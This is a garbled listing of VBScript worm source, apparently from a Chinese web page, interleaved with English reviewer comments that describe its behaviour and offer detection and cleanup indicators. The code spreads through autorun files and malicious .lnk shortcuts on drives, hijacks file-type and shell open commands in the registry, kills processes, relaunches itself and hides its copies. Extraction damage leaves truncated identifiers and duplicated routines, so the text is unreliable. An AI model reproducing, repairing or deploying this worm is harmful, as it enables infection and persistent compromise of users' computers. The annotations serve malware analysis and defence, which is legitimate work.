2024年1月7日发(作者:)
Case "oie" RunPath="""%ProgramFiles%Internet """ Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot% "&VirusLoad) Case "omc" RunPath=" /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot% "&VirusLoad)
Case "emc" RunPath=" /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot% "&VirusLoad) Case Else If PreDblInstance=True Then End If Timeout = Datediff("ww", GetInfectedDate, Date) - 12 If Timeout>0 And Month(Date) = Day(Date) Then Call VirusAlert() Call MakeJoke(CInt(Month(Date))) End If Call MonitorSystem()
' NOTE(review): this listing is extraction-damaged. Several Subs are collapsed onto
' one physical line, object qualifiers are cut off (e.g. "ists(", "cialFolder(") and
' registry paths have lost their separators, so it does not run as shown. The comments
' describe only what the visible text does, as an aid to detection and cleanup.
'
' MonitorSystem: an endless Do...Loop that calls KillProcess on a list of process
' names (all seven are blank in this copy), re-applies InvadeSystem and calls
' KeepProcess for the copy named by GetMainVirus(1). The bare "3000" is presumably
' what is left of a sleep call between passes.
' InvadeSystem (begins on the same line): builds the command strings that are compared
' against the registry further down, and three HKEY_CURRENT_USER value paths ending in
' Load, Ver and Date. Version is hard-coded to 1.
End SelectEnd SubSub MonitorSystem() On Error Resume Next Dim ProcessNames, ExeFullNames ProcessNames=Array("","","","","","","") VBSFullNames=Array(GetMainVirus(1)) Do Call KillProcess(ProcessNames) Call InvadeSystem(GetMainVirus(1),GetMainVirus(0)) Call KeepProcess(VBSFullNames) 3000 LoopEnd SubSub InvadeSystem(VirusLoadPath,VirusAssPath) On Error Resume Next Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version Load_Value=""""&VirusLoadPath&"""" File_Value="%SystemRoot% "&""""&VirusAssPath&""""&" %1 %* " IE_Value="%SystemRoot% "&""""&VirusAssPath&""""&" OIE " MyCpt_Value1="%SystemRoot% "&""""&VirusAssPath&""""&" OMC " MyCpt_Value2="%SystemRoot% "&""""&VirusAssPath&""""&" EMC " HCULoad="HKEY_CURRENT_USERSoftWareMicrosoftWindows NTCurrentVersionWindowsLoad" HCUVer="HKEY_CURRENT_USERSoftWareMicrosoftWindows NTCurrentVersionWindowsVer" HCUDate="HKEY_CURRENT_USERSoftWareMicrosoftWindows NTCurrentVersionWindowsDate" VirusCode=GetCode(FullName) Version=1 HostSourcePath=cialFolder(1)&"" HostFilePath=cialFolder(0)&""
' Drive loop: for every drive passing the (truncated) readiness test whose type value
' is 1, 2 or 3 (presumably the FileSystemObject DriveType codes; confirm), a per-drive
' name is formed from GetSerialNumber plus ".vbs" and handed to CreateAutoRun and
' InfectRoot. The CreateAutoRun call appears twice because this line and the next
' overlap in the extracted text.
For Each Drive In If y and (ype=1 Or ype=2 Or ype=3) Then DiskVirusName=GetSerialNumber(etter)&".vbs" Call CreateAutoRun(etter,DiskVirusName)
Call CreateAutoRun(etter,DiskVirusName) Call InfectRoot(etter,DiskVirusName) End If Next
' Self-repair of the dropped files: if either script copy or the host copy is missing,
' or the stored version is lower than Version, all three are written again. In the
' non-NTFS branch every file gets SetHiddenAttr. In the NTFS branch only HostFilePath
' does, and there GetMainVirus builds the script path with ":" after the folder.
If ists(VirusAssPath)=False Or ists(VirusLoadPath)=False Or ists(HostFilePath)=False Or GetVersion()< Version Then If GetFileSystemType(GetSystemDrive())="NTFS" Then Call CreateFile(VirusCode,VirusAssPath) Call CreateFile(VirusCode,VirusLoadPath) Call CopyFile(HostSourcePath,HostFilePath) Call SetHiddenAttr(HostFilePath) Else Call CreateFile(VirusCode, VirusAssPath) Call SetHiddenAttr(VirusAssPath) Call CreateFile(VirusCode,VirusLoadPath) Call SetHiddenAttr(VirusLoadPath) Call CopyFile(HostSourcePath, HostFilePath) Call SetHiddenAttr(HostFilePath) End If End If
' Persistence indicator: the Load value (separators lost in extraction; presumably
' HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load) is rewritten whenever
' it differs from the quoted script path. MonitorSystem re-runs this Sub in a loop, so
' a manual deletion is undone while the script process is still alive; cleanup has to
' stop the process first.
If ReadReg(HCULoad)<>Load_Value Then Call WriteReg (HCULoad, Load_Value, "") End If
' Ver and Date are marker values next to Load: Ver records the installed version, Date
' is written only once. GetInfectedDate feeds the week-count check in the dispatcher
' above, so Date presumably holds the first-infection date.
If GetVersion() < Version Then Call WriteReg (HCUVer, Version, "") End If
If GetInfectedDate() = "" Then Call WriteReg (HCUDate, Date, "") End If
' File-association hijack checks (still inside InvadeSystem). Each line reads the
' shell open command of one file class under HKEY_LOCAL_MACHINE SOFTWARE Classes
' (txtfile, inifile, inffile, batfile, cmdfile, regfile, a truncated entry handled by
' SetchmFileAss, and hlpfile) and calls the matching Set*FileAss helper if the value is
' not File_Value. Opening any of these file types therefore starts the script copy at
' VirusAssPath with the clicked file as "%1 %*".
' Detection/cleanup: compare these open-command values with a known-good baseline; a
' command that names a .vbs file is the indicator. Path separators were lost in
' extraction, so the key strings below are not usable verbatim.
If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassestxtfileshellopencommand")<>File_Value Then Call SetTxtFileAss(VirusAssPath) End If
If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassesinifileshellopencommand")<>File_Value Then Call SetIniFileAss(VirusAssPath) End If
If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassesinffileshellopencommand")<>File_Value Then Call SetInfFileAss(VirusAssPath) End If
If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassesbatfileshellopencommand")<>File_Value Then Call SetBatFileAss(VirusAssPath) End If
If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassescmdfileshellopencommand")<>File_Value Then Call SetCmdFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClassesregfileshellopencommand")<>File_Value Then Call SetRegFileAss(VirusAssPath) End If
If ReadReg("HKEY_LOCAL_ellopencommand")<>File_Value Then Call SetchmFileAss(VirusAssPath) End If
If ReadReg("HKEY_LOCAL_MACHINESOFTWAREClasseshlpfileshellopencommand")<>File_Value Then Call SethlpFileAss(VirusAssPath) End If
' Shell-object hijack checks. The first line below is a duplicated fragment of the one
' after it (an If with no body), another extraction artifact. The remaining checks
' cover a truncated HKEY_LOCAL_ key and the OpenHomePage command of CLSID
' {871C5380-42A0-1069-A2EA-08002B30309D}, both compared with IE_Value, plus the open
' and explore commands of CLSID {20D04FE0-3AEA-1069-A2D8-08002B30309D}, compared with
' MyCpt_Value1 and MyCpt_Value2. The appended OIE / OMC / EMC arguments match the
' "oie", "omc" and "emc" Case labels of the dispatcher above (presumably compared
' case-insensitively; confirm).
If ReadReg("HKEY_LOCAL_llopencommand")<>IE_Value Then
If ReadReg("HKEY_LOCAL_llopencommand")<>IE_Value Then Call SetIEAss(VirusAssPath) End If
If ReadReg("HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand")<>IE_Value Then Call SetIEAss(VirusAssPath) End If
If ReadReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellopencommand")<>MyCpt_Value1 Then Call SetMyComputerAss(VirusAssPath) End If
If ReadReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellexplorecommand")<>MyCpt_Value2 Then Call SetMyComputerAss(VirusAssPath) End If
' InvadeSystem ends with a call to RegSet. CopyFile (starts here) removes an existing
' destination and then copies source to pathf; the method names are truncated in this
' copy ("File pathf , True", "le source, pathf").
Call RegSet()End SubSub CopyFile(source, pathf) On Error Resume Next If ists(pathf) Then File pathf , True End If
' CreateFile opens pathf with mode 2 (the create flag is True only when the file is
' absent) and writes the code text. The Sub appears twice on this line, presumably a
' duplication introduced by extraction. Each Sub starts with On Error Resume Next, so
' failures are silent.
le source, pathfEnd SubSub CreateFile(code, pathf) On Error Resume Next Dim FileText If ists(pathf) Then Set FileText=xtFile(pathf, 2, False) code Else Set FileText=xtFile(pathf, 2, True) code End IfEnd SubSub CreateFile(code, pathf) On Error Resume Next Dim FileText If ists(pathf) Then Set FileText=xtFile(pathf, 2, False) code Else Set FileText=xtFile(pathf, 2, True) code End IfEnd SubSub RegSet() On Error Resume Next
' RegSet: defence-evasion settings, all useful as host indicators.
'   RegPath1/RegPath2: the CheckedValue entries of Explorer's Hidden NOHIDDEN and
'     SHOWALL options are set to 3 and 2 (presumably non-default values that stop the
'     "show hidden files" option from taking effect; confirm against a clean host).
'   RegPath3: NoDriveTypeAutoRun in the HKCU Explorer policies is set to 0, which
'     leaves AutoRun enabled for every drive type.
'   RegPath4: the lnkfile IsShortcut value is deleted (presumably to drop the shortcut
'     arrow overlay, so the .lnk files made by InfectRoot look like folders).
' Cleanup should restore these values as well as removing the dropped files.
Dim RegPath1 , RegPath2, RegPath3, RegPath4 RegPath1="HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenNOHIDDENCheckedValue" RegPath2="HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue" RegPath3="HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun" RegPath4="HKEY_CLASSES_ROOTlnkfileIsShortcut" Call WriteReg (RegPath1, 3, "REG_DWORD") Call WriteReg (RegPath2, 2, "REG_DWORD") Call WriteReg (RegPath3, 0, "REG_DWORD") Call DeleteReg (RegPath4)
' KillProcess (starts here): connects to WMI and walks the supplied process names.
End SubSub KillProcess(ProcessNames) On Error Resume Next Set WMIService=GetObject("winmgmts:.rootcimv2") For Each ProcessName in ProcessNames
' KillProcess (continued): queries win32_process by name and ends each match. If the
' return code is non-zero it falls back to a hidden "CMD /c ntsd -c q -p" command (the
' process-id operand is cut off in this copy).
' KillImmunity: if the item D & ":" & <name> exists (the name is stripped; the Sub
' name suggests a protective "immunity" folder on the drive root; confirm), it grants
' everyone full control with CACLS and removes it with RD /S /Q, both hidden.
' Detection: hidden cmd.exe children of a script host running ntsd, CACLS or RD.
' KeepProcess (starts here): loops over the script paths it is given.
Set ProcessList=ery(" Select * From win32_process where name ='"&ProcessName&"' ") For Each Process in ProcessList IntReturn=ate If intReturn<>0 Then "CMD /c ntsd -c q -p "&, vbHide, False End If Next NextEnd SubSub KillImmunity(D) On Error Resume Next ImmunityFolder=D&":" If Exists(ImmunityFolder) Then ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True End IfEnd SubSub KeepProcess(VBSFullNames) On Error Resume Next For Each VBSFullName in VBSFullNames
' KeepProcess (continued): relaunches a script whenever VBSProcessCount reports fewer
' than 2 instances, so ending a single instance is not enough during cleanup.
' GetSystemDrive returns the first two characters of special folder 0.
' GetFileSystemType returns a drive's file-system name.
' ReadReg / WriteReg / DeleteReg wrap a COM object whose ProgID is blank in this copy.
' WriteReg omits the type argument when vtype is "". None of the three uses
' On Error Resume Next.
If VBSProcessCount(VBSFullName) < 2 then Run("%SystemRoot% "&VBSFullName) End If NextEnd SubFunction GetSystemDrive() GetSystemDrive=Left(cialFolder(0),2)End FunctionFunction GetFileSystemType(Drive) Set d=ve(Drive) GetFileSystemType=stemEnd FunctionFunction ReadReg(strkey) Dim tmps Set tmps=CreateObject("") ReadReg=d(strkey) Set tmps=NothingEnd FunctionSub WriteReg(strkey, Value, vtype) Dim tmps Set tmps=CreateObject("") If vtype="" Then te strkey, Value Else te strkey, Value, vtype End If Set tmps=NothingEnd SubSub DeleteReg(strkey) Dim tmps Set tmps=CreateObject("") ete strkey
' SetHiddenAttr: sets the attribute value 6 on a file or folder (presumably
' Hidden + System, 2 + 4; the property name is truncated to "utes").
' Run: launches a command line through a shell object (ProgID blank in this copy).
' InfectRoot: writes a hidden script copy to the drive root. For every sub-folder of
' the root it then hides the folder and creates a same-named .lnk whose target is the
' script, passing the folder path plus "Dir" as the argument. An existing .lnk with a
' different target is deleted and recreated.
' Detection on removable media: root-level .lnk files whose target is a .vbs file,
' sitting beside hidden folders of the same names.
Set tmps=NothingEnd SubSub SetHiddenAttr(path) On Error Resume Next Dim vf Set vf=e(path) Set vf=der(path) utes=6End SubSub Run(ExeFullName) On Error Resume Next Dim WshShell Set WshShell=Object("") ExeFullName Set WshShell=NothingEnd SubSub InfectRoot(D,VirusName) On Error Resume Next Dim VBSCode VBSCode=GetCode(FullName) VBSPath=D&":"&VirusName If ists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath) Call SetHiddenAttr(VBSPath) End If Set Folder=der(D&":") Set SubFolders=ders For Each SubFolder In SubFolders SetHiddenAttr() LnkPath=D&":"&&".lnk" TargetPath=D&":"&VirusName Args=""""&D&":"&& "Dir""" If ists(LnkPath)=False Or GetTargetPath(LnkPath) <> TargetPath Then If ists(LnkPath)=True Then File LnkPath, True End If Call CreateShortcut(LnkPath,TargetPath,Args) End If NextEnd Sub
' CreateShortcut: saves a .lnk with the given target and arguments, WindowStyle 4 and
' an icon taken from index 3 of a %SystemRoot% file whose name is stripped here.
' CreateAutoRun: if either the root-level file at InfPath (name stripped) or the script
' copy is missing, it writes a hidden script copy and builds an [AutoRun] section whose
' Shellexecute and shell open entries start that copy. The StrInf string is cut off at
' the end of this line in this copy.
' Detection: a hidden [AutoRun] file on a drive root that references a .vbs file named
' after the volume serial number (see GetSerialNumber).
Sub CreateShortcut(LnkPath,TargetPath,Args) Set Shortcut=Shortcut(LnkPath) with Shortcut .TargetPath=TargetPath .Arguments=Args .WindowStyle=4 .IconLocation="%SystemRoot%, 3" .Save end withEnd SubSub CreateAutoRun(D,VirusName) On Error Resume Next Dim InfPath, VBSPath, VBSCode InfPath=D&":" VBSPath=D&":"&VirusName VBSCode=GetCode(FullName) If ists(InfPath)=False Or ists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath) Call SetHiddenAttr(VBSPath) StrInf="[AutoRun]"&VBCRLF&"Shellexecute= "&VirusName&" ""AutoRun"""&VBCRLF&"shellopen=打开(&O)"&VBCRLF&"shellopencommand=WScr
' CreateAutoRun (continued): calls KillImmunity for the drive before writing and
' hiding the [AutoRun] file.
' SetTxtFileAss, SetIniFileAss, SetInfFileAss, SetBatFileAss, SetCmdFileAss,
' SethlpFileAss, SetRegFileAss and SetchmFileAss are identical apart from the file
' class. Each writes the script command line followed by " %1 %* " to that class's
' shell open command as REG_EXPAND_SZ. SetIEAss starts at the end of this line.
Call KillImmunity(D) Call CreateFile(StrInf, InfPath) Call SetHiddenAttr(InfPath) End IfEnd SubSub SetTxtFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassestxtfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetIniFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassesinifileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetInfFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassesinffileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetBatFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassesbatfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetCmdFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassescmdfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SethlpFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClasseshlpfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetRegFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINESOFTWAREClassesregfileshellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetchmFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot% "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_ellopencommand", Value, "REG_EXPAND_SZ")End SubSub SetIEAss(sFilePath) On Error Resume Next Dim Value
' SetIEAss (continued): writes the script command line with the OIE argument to a
' truncated HKEY_LOCAL_ key and to the OpenHomePage command of CLSID
' {871C5380-42A0-1069-A2EA-08002B30309D}.
' SetMyComputerAss: clears the default shell verb of CLSID
' {20D04FE0-3AEA-1069-A2D8-08002B30309D}, then writes its open and explore commands
' with the OMC and EMC arguments.
' GetSerialNumber: returns a drive's serial number with "-" removed. Every dropped
' script is named <serial>.vbs, so the name differs per volume and a fixed file-name
' indicator will not match.
' GetMainVirus: on NTFS it joins special folder N and the script name with ":", which
' looks like an alternate-data-stream path on the folder itself (confirm). A plain
' directory listing would not show such a copy, so use a stream-aware listing when
' hunting for it. On other file systems the name is appended to the folder path (the
' separator is stripped in this copy).
' VBSProcessCount: counts the processes among three names (blank here) whose command
' line contains VBSPath. PreDblInstance is True when that count is 3 or more.
' GetTargetPath: returns the target path stored in an existing .lnk.
Value="%SystemRoot% "&""""&sFilePath&""""&" OIE " Call WriteReg("HKEY_LOCAL_llopencommand", Value, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand", Value, "REG_EXPAND_SZ")End SubSub SetMyComputerAss(sFilePath) On Error Resume Next Dim Value1,Value2 Value1="%SystemRoot% "&""""&sFilePath&""""&" OMC " Value2="%SystemRoot% "&""""&sFilePath&""""&" EMC " Call WriteReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shell", "", "REG_SZ") Call WriteReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellopencommand", Value1, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellexplorecommand", Value2, "REG_EXPAND_SZ")End SubFunction GetSerialNumber(Drv) On Error Resume Next Set d=ve(Drv) GetSerialNumber=Number GetSerialNumber=Replace(GetSerialNumber,"-","")End FunctionFunction GetMainVirus(N) On Error Resume Next MainVirusName=GetSerialNumber(GetSystemDrive())&".vbs" If GetFileSystemType(GetSystemDrive())="NTFS" Then If N=1 Then GetMainVirus=cialFolder(N)&":"&MainVirusName End If If N=0 Then GetMainVirus=cialFolder(N)&":"&MainVirusName End If Else GetMainVirus=cialFolder(N)&""&MainVirusName End IfEnd FunctionFunction VBSProcessCount(VBSPath) On Error Resume Next Dim WMIService, ProcessList, Process VBSProcessCount=0 Set WMIService=GetObject("winmgmts:.rootcimv2") Set ProcessList=ery("Select * from Win32_Process Where "&"Name='' or Name='' or Name=''") For Each Process in ProcessList If InStr(dLine, VBSPath)>0 Then VBSProcessCount=VBSProcessCount+1 End If NextEnd FunctionFunction PreDblInstance() On Error Resume Next PreDblInstance=False If VBSProcessCount(FullName)>= 3 Then PreDblInstance=True End IfEnd FunctionFunction GetTargetPath(LnkPath) On Error Resume Next Dim Shortcut Set Shortcut=Shortcut(LnkPath) GetTargetPath=PathEnd Function

